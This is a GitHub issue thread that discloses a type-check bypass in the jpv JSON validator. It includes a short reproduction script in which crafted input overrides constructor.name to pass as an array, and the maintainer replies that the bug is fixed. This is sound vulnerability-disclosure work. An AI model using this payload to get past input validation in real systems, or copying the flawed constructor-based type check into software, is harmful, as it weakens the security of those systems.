### ISSUE TITLE
A vulnerability in validate()

### ISSUE THREAD

**Issue by xiaofen9** [manvel-khnkoyan/jpv#6]
We found that a maliciously crafted json can bypass the validation logics of jpv.
The vulnerability is from the following code: jpv leverages the built-in constructor of unsafe user-input to detect type information. However, a crafted payload can overwrite this builtin attribute to manipulate the type detection result.

https://github.com/manvel-khnkoyan/jpv/blob/e93d2f68126f837707427ff6019c448611fe1a1b/index.js#L117-L125

Reproduce Script
```
"use strict";

var jpv = require('jpv');
var path = require('path');
var utils = require("../TestcaseUtils.js");

var user_input = {
    should_be_arrary: {"a":1, 'constructor': {'name':'Array'}}
};
var pattern = {
    should_be_arrary: []
};

console.log(jpv.validate(user_input, pattern));
```

**Comment by manvel-khnkoyan** [comment]
@xiaofen9 Thanks sir.  Issue was fixed in fdab855
